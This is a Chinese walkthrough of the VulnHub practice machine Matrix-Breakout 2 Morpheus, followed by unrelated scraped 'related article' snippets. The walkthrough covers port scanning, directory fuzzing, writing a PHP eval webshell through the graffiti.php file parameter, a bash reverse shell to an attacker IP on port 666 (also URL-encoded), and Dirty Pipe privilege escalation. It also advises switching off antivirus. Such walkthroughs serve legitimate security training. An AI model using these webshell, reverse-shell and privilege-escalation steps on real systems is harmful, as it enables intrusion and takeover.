vulnhub靶场之Matrix-Breakout 2 Morpheus

一.环境搭建

1.靶场描述

This is the second in the Matrix-Breakout series, subtitled Morpheus:1. It’s themed as a throwback to the first Matrix movie. You play Trinity, trying to investigate a computer on the Nebuchadnezzar that Cypher has locked everyone else out from, which holds the key to a mystery.
Difficulty: Medium-Hard 
 

2.靶场地址

https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/
 

3.启动靶场

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.52.0/24

二.渗透测试

1.目标

目标就是我们搭建的靶场,靶场IP为:192.168.52.0/24

2.信息收集

(1)寻找靶场真实ip

nmap -sP 192.168.52.0/24
 
arp-scan -l
 

靶场真实ip地址为192.168.52.135

(2)探测端口及服务

nmap -p- -sV 192.168.52.135
 
发现开启了80端口,APache httpd 2.4.51((Debian))
发现开启了22端口,OpenSSH 8.4p1 Debian 5 (protocol 2.0)
发现开启了81端口,nginx 1.18.0

也可以使用masscan进行探测

masscan --rate=10000 --ports 0-65535 192.168.52.135
 

(3)web指纹识别

whatweb -v 192.168.52.135
 

3.渗透测试

(1)访问web服务

http://192.168.52.135
 
http://192.168.52.135:81
 

访问81端口,发现需要账号密码,尝试了一下弱口令,未能成功登录。

(2)扫描web服务

1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.52.135
 

没有有用的信息

2)nikto扫描网站结构
nikto -h http://192.168.52.135
 
3)dirsearch目录扫描
dirsearch -u 192.168.52.135 -e * -x 403 --random-agent
 

扫描到一个robots.txt

没有任何信息

截止到目前,我们没有找到任何有用的信息,我们可以换一个思路进行

还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,我们使用另外两个字典进行扫描
 
ffuf -u http://192.168.52.135/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
 

gobuster dir -u http://192.168.52.135 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
 
graffiti.txt
graffiti.php
 

接下来我们访问这两个php,txt文件

(3)渗透测试

1)访问graffiti.php页面

我们可以看到有一个输入框,我们输入MS02423,看到返回页面显示了MS02423

2)访问graffiti.txt页面

我们可以看到返回页面和graffiti.php页面是一样的

然后我们进行抓包看看,我们可以看到变量名是file

此处有一个file变量,那么改变file变量可以直接对靶机文件修改,能随意创建文件,二话不说写个马,准备反弹shell

3)抓包写入一句话木马

在burp里面空格要使用+号代替

message=<?php+@eval($_POST[MS02423]);?>&file=MS02423.php
 
在写入一句话木马的时候,大家一定要把火绒关闭,不然的话会把杀掉
 

蚁剑连接成功,我们可以看到一些文件,但是都没有什么用

我们进入虚拟终端看看有没有什么东西,最后发现了一个flag 1

我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag,图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。

4)反弹webshell

蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.52.152/666 0>&1'"); ?>
 

编码之后,访问文件即可即可反弹shell

%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.52.152%2F666+0%3E%261%27%22%29%3B+%3F%3E  
 

浏览器访问即可

http://192.168.52.152/3.php
 

我们使用ls -la 可以看到隐藏图片,我们进行下载到kali

5)分析图片

我们访问图片

http://192.168.52.135/.cypher-neo.png
 

问题就是它了,网站上看不出来问题下载下看看,这里用到了一下图片隐写的知识

wget http://192.168.52.135/.cypher-neo.png
binwalk .cypher-neo.png
 

!!!!捆绑好家伙行

binwalk -e .cypher-neo.png --run-as=root
 

研究了半天都没有研究出来什么东西,我们直接进行提权看看

6)进行提权

查看一下当前linux的内核版本

uname -a
 

系统是Linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847

https://github.com/r1is/CVE-2022-0847
 

下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接到靶机里),给权限直接跑

蚁剑里面有bug,我们反弹shell,在kali里面进行

我们可以看到提权已经是root了,我们直接查看flag即可

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.dirsearch目录扫描

9.burp工具的使用

10.kali反弹shell

11.蚁剑的使用

12.gobuster.ffuf

13.binwalk工具的使用

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/249075.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

WebAssembly核心编程[1]:wasm模块实例化的N种方式

当我们在一个Web应用中使用WebAssembly&#xff0c;最终的目的要么是执行wasm模块的入口程序&#xff08;通过start指令指定的函数&#xff09;&#xff0c;要么是调用其导出的函数&#xff0c;这一切的前提需要创建一个通过WebAssembly.Instance对象表示的wasm模块实例(源代码…

vuex组件之间共享数据的方式

父向子传值:v-bind 属性绑定 子向父传值:v-on 事件绑定 $on 接收数据的那个组件 $emit 发送数据的那个组件 其他的传值方式: ref 获取dom元素还有组件 $children获取子组件集合 $parent获取父组件 路由参数--组件传值 1.Vuex概述 1 1.Vuex概述 Vuex是实现组件全局状…

【LUA】mac状态栏添加天气

基于网络上的版本修改的&#xff0c;找不到出处了。第一个摸索的lua脚本&#xff0c;调了很久。 主要修改&#xff1a;如果风速不大&#xff0c;就默认不显示&#xff0c;以及调整为了一些格式 local urlApi http://.. --这个urlApi去申请个免费的就可以了 然后打开对应的json…

Vue学习Element-ui

声明&#xff1a;本文来源于黑马程序员PDF讲义 Ajax 我们前端页面中的数据&#xff0c;如下图所示的表格中的学生信息&#xff0c;应该来自于后台&#xff0c;那么我们的后台和前端是 互不影响的2个程序&#xff0c;那么我们前端应该如何从后台获取数据呢&#xff1f;因为是2…

什么是git,怎样下载安装?

简介&#xff1a; 应用场景&#xff1a; 应用场景&#xff1a;团队企业开发 作用&#xff1a; 安装&#xff1a; 1.网址&#xff1a;Git - Downloads 很卡很慢 2.可以选择镜像网站下载&#xff08;推荐&#xff09; CNPM Binaries Mirror

k8s从私有库harbor中拉取镜像

一、前言 Docker镜像是构建应用程序的基础。然而&#xff0c;许多组织和开发团队希望保留他们的Docker镜像在私有仓库中&#xff0c;并从中拉取镜像&#xff0c;而不是从公共Docker Hub中下载。这样做的原因有很多&#xff0c;包括&#xff1a; 1. 安全性&#xff1a;私有仓库可…

利用onenet mqtt协议 ,ESP32上传温湿度数据流成功(arduinoIDE)

目标&#xff1a;开发esp32通过onenet平台远程控制LED、继电器等其它设备&#xff0c;并利用onenet可视化功能开发出一个简单的控制页面。 原以为能够快速完成&#xff0c;没想到接入mqtt协议、数据流上传、可视化按键都不同程度遇到了问题&#xff0c;还好经过一番查找和修改…

Android 使用高德地图

一、获取高德平台key 【1】基于application包名&sha1值在高德控制台获取key值&#xff0c;详情参考&#xff1a; 获取Key-创建工程-开发指南-Android 地图SDK | 高德地图API 【2】在manifest中声明权限 【3】将拿到的key值在manifest中进行声明 <!--允许程序打开网络…

HTTPS实现原理

1 为什么需要HTTPS&#xff1f; HTTP 在进行数据传输时采用明文传输&#xff0c;数据包中的用户信息等隐私数据可以被第三方通过抓包等方式窃取&#xff0c;是不安全的。 如果客户端使用 MD5 加密算法对数据进行加密&#xff0c;由于加密后的结果是不可逆的&#xff0c;服务器…

adf4159 直接调制/快速波形产生13 GHz小数N分频频率合成器

优势和特点 RF带宽达13 GHz高速和低速FMCW斜坡发生25位固定模数可提供次赫兹频率分辨率PFD频率最高达110 MHz归一化相位噪底&#xff1a;−224 dBc/HzFSK和PSK功能锯齿波、三角波和抛物线波形发生斜坡与FSK叠加具有2种不同扫描速率的斜坡斜坡延迟、频率回读和中断功能可编程相…

Blender教程(基础)-面的细分与删除、挤出选区-07

一、Blender之面的细分 新建一个立方体&#xff0c;在编辑模式下、选中一个面。 在选中的面上单击右键弹出细分选项&#xff0c;选择细分。 在选中细分后、会默认细分1次。修改细分次数在左下角 二、Blender之面的删除 选择中需要操作的面&#xff0c;在英文状态下按X键弹…

【计算机视觉】万字长文详解:卷积神经网络

以下部分文字资料整合于网络&#xff0c;本文仅供自己学习用&#xff01; 一、计算机视觉概述 如果输入层和隐藏层和之前一样都是采用全连接网络&#xff0c;参数过多会导致过拟合问题&#xff0c;其次这么多的参数存储下来对计算机的内存要求也是很高的 解决这一问题&#x…

linux 04 进程管理

02.进程管理 ps 在命令行输入ps后按回车键就能查看当前系统中正在运行的进程。 第一. 查看进程ps 进程的状态STAT 进程的周期 fork&#xff0c;产生一个新进程 第二.排序进程表 ps aux --sort -%cpu 降序cpu %cpu 增序cpu 第三.父子关系 ps ef 第四.自定义 五.动态查看…

FileZilla 的安装与使用

目录 一. FileZilla 是什么二. FileZilla 的安装1. 下载 FileZilla2. 安装 三. FileZilla 的使用 一. FileZilla 是什么 FileZilla 是一个免费的开源 FTP&#xff08;文件传输协议&#xff09;客户端软件&#xff0c;用于在计算机之间传输文件。它提供了一个直观的用户界面&am…

轮转数组[中等]

优质博文&#xff1a;IT-BLOG-CN 一、题目 给定一个整数数组nums&#xff0c;将数组中的元素向右轮转k个位置&#xff0c;其中k是非负数。 示例 1: 输入: nums [1,2,3,4,5,6,7], k 3 输出: [5,6,7,1,2,3,4] 解释: 向右轮转 1 步: [7,1,2,3,4,5,6] 向右轮转 2 步: [6,7,1,2,…

VueFire:一个一流的 Vue 和 Firebase 体验,包括对 Nuxt 的支持,现在已经稳定了

VueFire&#xff0c;一个一流的 Vue 和 Firebase 体验 — 包括对 Nuxt 的支持&#xff0c;现在已经稳定了。 Vue 和 Firebase 现在比以往任何时候都更好了。 构建更好的VueFire 去年&#xff0c;我们宣布与 Eduardo San Martin Morote 合作&#xff0c;构建一个成熟的 Vue 和…

蓝桥杯嵌入式第七届真题(完成) STM32G431

蓝桥杯嵌入式第七届真题(完成) STM32G431 题目 相关文件 main.c /* USER CODE BEGIN Header */ /********************************************************************************* file : main.c* brief : Main program body**********************…

我的创作纪念日和前端碎碎念

机缘 作为一个前端开发者&#xff0c;我一直热衷于将设计和技术相结合&#xff0c;尽可能提升用户体验。我最初成为创作者的初心源于学习记录&#xff0c;把创作当作一个笔记&#xff0c;希望把自己遇到的问题&#xff0c;以及学习到的实用技巧记录下来&#xff0c;方便学习回…

第九节HarmonyOS 常用基础组件22-Marquee

1、描述 跑马灯组件&#xff0c;用于滚动展示一段单行文本&#xff0c;仅当文本内容宽度超过跑马灯组件宽度时滚动。 2、接口 Marquee(value:{start:boolean, step?:number, loop?:number, fromStart?: boolean ,src:string}) 3、参数 参数名 参数类型 必填 描述 st…

智能指针——浅析

智能指针 本人不才&#xff0c;只能将智能指针介绍一下&#xff0c;无法结合线程进行深入探索 介绍及作用 在异常产生进行跳转时&#xff0c;通过栈帧回收进行内存释放&#xff0c;防止内存泄漏 基于RAII思想可以创建出只能指针 RAII(Resource Acquisition Is Initializatio…